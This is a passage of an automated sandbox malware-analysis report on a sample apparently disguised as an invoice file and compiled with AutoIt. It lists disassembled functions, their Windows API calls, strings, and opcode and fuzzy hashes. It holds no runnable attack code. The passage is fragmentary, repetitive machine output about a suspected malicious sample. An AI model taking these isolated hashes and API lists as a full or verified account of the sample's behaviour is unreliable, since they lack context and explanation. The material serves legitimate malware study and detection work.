SendMessageW.USER32(00000000,00000143,00000000,?), ref: 004F945C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004F9467

Strings

Combobox, xrefs: 004F9429

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: f1f9f2bb95fd6bab1f9439854b0e92e071874e7c339d601d806a553199679166
Instruction ID: 71d69fd2d9adf2ae0892e7651ca986107ee82da9c1563349bb84f266d3fe7d60
Opcode Fuzzy Hash: f1f9f2bb95fd6bab1f9439854b0e92e071874e7c339d601d806a553199679166
Instruction Fuzzy Hash: 8711B67130020D6FEF119F55DC80FBB376EEB583A4F104126FA15972A0D6359C528B64

Function 004FDA42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 004AB34E: GetWindowLongW.USER32(?,000000EB), ref: 004AB35F

GetActiveWindow.USER32 ref: 004FDA7B
EnumChildWindows.USER32(?,004FD75F,00000000), ref: 004FDAF5

Strings

T1N, xrefs: 004FDAFB

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Window$ActiveChildEnumLongWindows
String ID: T1N
API String ID: 3814560230-3285005403
Opcode ID: c99813124ed5e2887ae036f40c8fec93148f58ac7c5fd50f176b46b299a7ac1d
Instruction ID: 576e1ca7f4ca646cbf871b246089a2f2a6e29d5dcbcd095d2a10cab01b4a620c
Opcode Fuzzy Hash: c99813124ed5e2887ae036f40c8fec93148f58ac7c5fd50f176b46b299a7ac1d
Instruction Fuzzy Hash: 31216D35A04704DFC715DF28D860AA67BF6FF69321F25061EE966873E0D734A804DB68

Function 004F98FE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 004AD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 004AD1BA
Part of subcall function 004AD17C: GetStockObject.GDI32(00000011), ref: 004AD1CE
Part of subcall function 004AD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 004AD1D8

GetWindowRect.USER32(00000000,?), ref: 004F9968
GetSysColor.USER32(00000012), ref: 004F9982

Strings

static, xrefs: 004F9945

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 1c82878df65edb6d109481ba123180db8275483abf5d005c3f10185b26d788e9
Instruction ID: 35d6a05eb1fc95a0773a89f841d0d877ec3c2afcb2b4ebd16f1d9550050a5020
Opcode Fuzzy Hash: 1c82878df65edb6d109481ba123180db8275483abf5d005c3f10185b26d788e9
Instruction Fuzzy Hash: 9B1117B2510209AFDB05DFB8CC45EFA7BA8FB08344F014619FA55E2250E678E851DB64

Function 004F9617 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 004F9699
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004F96A8

Strings

edit, xrefs: 004F967D

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 31a9505ea4e5a46dfef92a453d00c8695f7831a260f3454be786338593371a3e
Instruction ID: 4574b60b838fa89e0ce3570e36cd3910583ca7ae0e0b8f39dc978beba4f45c2f
Opcode Fuzzy Hash: 31a9505ea4e5a46dfef92a453d00c8695f7831a260f3454be786338593371a3e
Instruction Fuzzy Hash: 22116A71500208AAFF115F64DC40FFB3B6AEB153A8F104316FA65D72E0C7399C51AB68

Function 004D5262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004D52D5
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 004D52F4

Strings

0, xrefs: 004D52CE

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 40fc164165d2a17467224c9ebf1bdcd189317f7e9569be46e9c74afe074ca6b1
Instruction ID: d2602f0a5bb252bcccd2d369f19f0e639ce460ad62ddcb9daf08722911c5f4be
Opcode Fuzzy Hash: 40fc164165d2a17467224c9ebf1bdcd189317f7e9569be46e9c74afe074ca6b1
Instruction Fuzzy Hash: CB112632A00714ABDB20DF9CC921B9E7BB8AB05390F040017EC11E7390DBB4ED09CBA9

Function 004E4D9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004E4DF5
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 004E4E1E

Strings

<local>, xrefs: 004E4DE6

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 227c7b512b87a3af29fee0e464f65f73fcd494d7ae72f3aee713b70a2277fd33
Instruction ID: 8a7b77b36fe3ef4600a1f9027c119fb7176ecad8a3550782dc87b09fee311100
Opcode Fuzzy Hash: 227c7b512b87a3af29fee0e464f65f73fcd494d7ae72f3aee713b70a2277fd33
Instruction Fuzzy Hash: FB11CE70500261BADB258F528C88EEBFBA8FB96356F10822BF10546640D2746941D6F4

Function 004BA70C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004C37A7
___raise_securityfailure.LIBCMT ref: 004C388E

Strings

(U, xrefs: 004C3889

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: (U
API String ID: 3761405300-1739593084
Opcode ID: 4c8316decb1fc939a4d56f8ca57868742fec7ba6dbc84084d93598cccceceb32
Instruction ID: 6239bad13aaf55654de7dde19324a11589c7bc6d6cec5c0b99eed4640f30e429
Opcode Fuzzy Hash: 4c8316decb1fc939a4d56f8ca57868742fec7ba6dbc84084d93598cccceceb32
Instruction Fuzzy Hash: C7211DB5501304DBE740DF55F9A67813BF8BB68316F20A82AE9048B3E0D3F46948EF45

Function 004EA82C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON

Download Yara Rule

APIs

inet_addr.WS2_32(00000000), ref: 004EA84E
htons.WS2_32(00000000), ref: 004EA88B

Strings

255.255.255.255, xrefs: 004EA866

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: htonsinet_addr
String ID: 255.255.255.255
API String ID: 3832099526-2422070025
Opcode ID: 77e2ac5e9b2c559aad21a00647eda97bcf30d7f589d71a4071c5c5ba9d48e2c3
Instruction ID: 9ebea4b41d236d123c2dc52b7a6e2f49e6995766e7790a190dec723eaefe8ec8
Opcode Fuzzy Hash: 77e2ac5e9b2c559aad21a00647eda97bcf30d7f589d71a4071c5c5ba9d48e2c3
Instruction Fuzzy Hash: FB010079200304ABCB11EF69C896FAAB364FF04315F10842BF5169B3D1D739E816C76A

Function 004CB781 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 004CB7EF

Strings

ListBox, xrefs: 004CB7B9
ComboBox, xrefs: 004CB78B

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: f2d672086367ca1c5e0da421081dd040d40160d1c590bef96b3ba155559d465b
Instruction ID: 252c14c1c6fee4d73db583e05bc5007b45c58bd62642606bc6d3d6da82274245
Opcode Fuzzy Hash: f2d672086367ca1c5e0da421081dd040d40160d1c590bef96b3ba155559d465b
Instruction Fuzzy Hash: DF01F575601114ABCB44EBA4DC52EFE3769BF45314B00062EF462532C1EB78580887E8

Function 004CB67D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000180,00000000,?), ref: 004CB6EB

Strings

ListBox, xrefs: 004CB6B5
ComboBox, xrefs: 004CB687

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: cc71ddb27c2e35b7778ddec41c512575e9b4c2fd70c2d4fd677d5fec30c1701a
Instruction ID: 3365fb0f21e832c87e44049a63f1bc025fb7158b6ee3d54964a76789249dd0a9
Opcode Fuzzy Hash: cc71ddb27c2e35b7778ddec41c512575e9b4c2fd70c2d4fd677d5fec30c1701a
Instruction Fuzzy Hash: 0E018F79A41004BBCB44EBA5C953FFF77A89F05348F10002EB402A3281EB985E1897FA

Function 004CB700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000182,?,00000000), ref: 004CB76C

Strings

ListBox, xrefs: 004CB738
ComboBox, xrefs: 004CB70A

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: b62cbb6aab5915efeadbb204c9c47f921c4acf2bb1caf88b9bac2c740603af7e
Instruction ID: 23f8982741804f8b0c368754043802be613c15d9c282b3306943af71d8efa686
Opcode Fuzzy Hash: b62cbb6aab5915efeadbb204c9c47f921c4acf2bb1caf88b9bac2c740603af7e
Instruction Fuzzy Hash: C4018479641104BACB41E7A5D953FFE77A89F05348F50002EB80273191DB585E1987F9

Function 004B4D7C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 004B4D9E
__calloc_crt.LIBCMT ref: 004B4DB7

Strings

"U, xrefs: 004B4DCE

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: __calloc_crt
String ID: "U
API String ID: 3494438863-1484945351
Opcode ID: 6ef39e898d6d584b901850202d9d23f6515f0929a28129ca959646b2548d8516
Instruction ID: f699ea7a3a0ac2c2a78c1f89387219c5fac24a69bc737e6b75fd4b36e7bafcf3
Opcode Fuzzy Hash: 6ef39e898d6d584b901850202d9d23f6515f0929a28129ca959646b2548d8516
Instruction Fuzzy Hash: F3F04C792483015AF7148F59BC506E667D8F761764F10052FF208CA286E738C8415BBD

Function 00494024 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

LoadImageW.USER32(00490000,00000063,00000001,00000010,00000010,00000000), ref: 00494048
EnumResourceNamesW.KERNEL32(00000000,0000000E,004D67E9,00000063,00000000,75A50280,?,?,00493EE1,?,?,000000FF), ref: 005041B3

Strings

>I, xrefs: 00494028

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: EnumImageLoadNamesResource
String ID: >I
API String ID: 1578290342-2868147925
Opcode ID: d84a56a460842f1c3afe4f8cdcce81caf3a55bb291b82e5005120c2aa15b11ff
Instruction ID: 58e21ec4528eb33584c6fb2ea7be0890d9ea9f0e315c607e9b1fa79a4ce4d66b
Opcode Fuzzy Hash: d84a56a460842f1c3afe4f8cdcce81caf3a55bb291b82e5005120c2aa15b11ff
Instruction Fuzzy Hash: A8F0F63134071077D6204B25FC5AFC23E69E764BB2F100106F310971E0D2F49088EAA8

Function 004D7744 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 004D7762
_wcscmp.LIBCMT ref: 004D7774

Strings

#32770, xrefs: 004D776E

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: 8945fb38d023a386d1e751a3b93d100a9b96b64e682a548cc9133f4013747420
Instruction ID: 4d3e7aeab10eb798ac9e8d271a49aa08d48d6e261098fed3f9f612ba5e0313a0
Opcode Fuzzy Hash: 8945fb38d023a386d1e751a3b93d100a9b96b64e682a548cc9133f4013747420
Instruction Fuzzy Hash: FAE0927760432527DB20AAA59C49EC7FBACAB61764F01005BB905D3151E664A605C7E4

Function 004CA631 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004CA63F

Part of subcall function 004B13F1: _doexit.LIBCMT ref: 004B13FB

Strings

AutoIt, xrefs: 004CA633
Error allocating memory., xrefs: 004CA638

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: 3465aec1d8da9cb21cdaabdb18e1fb8bdf7c16eb991022bd1f1dd9c1008f28a7
Instruction ID: 209f1fb973803867558c666b8aff2d5f498f7a75579566b7c2f25da40ec71faf
Opcode Fuzzy Hash: 3465aec1d8da9cb21cdaabdb18e1fb8bdf7c16eb991022bd1f1dd9c1008f28a7
Instruction Fuzzy Hash: FCD0C2313C032832D210269A2C17FC57A489B29B59F14002BBF08951C249EA958002ED

Function 0050AE86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 0050ACC0
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0050AEBD

Strings

WIN_XPe, xrefs: 0050ACD3

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: DirectoryFreeLibrarySystem
String ID: WIN_XPe
API String ID: 510247158-3257408948
Opcode ID: f6aae78bbb05c7cb83c7ba5dc20ab266ef9c0922048b5c1e95d4e56f2a528792
Instruction ID: 9a76e526abc032140659ae3eb210de1845ac7ad0245f2c5a3ddd5c14567e743a
Opcode Fuzzy Hash: f6aae78bbb05c7cb83c7ba5dc20ab266ef9c0922048b5c1e95d4e56f2a528792
Instruction Fuzzy Hash: 0EE06DB0C00649EFEB11DBA5D9449ECBBB8BB58301F118086F012B25A0CB745E88EF36

Function 004F86CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004F86E2
PostMessageW.USER32(00000000), ref: 004F86E9

Part of subcall function 004D7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 004D7AD0

Strings

Shell_TrayWnd, xrefs: 004F86DB

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

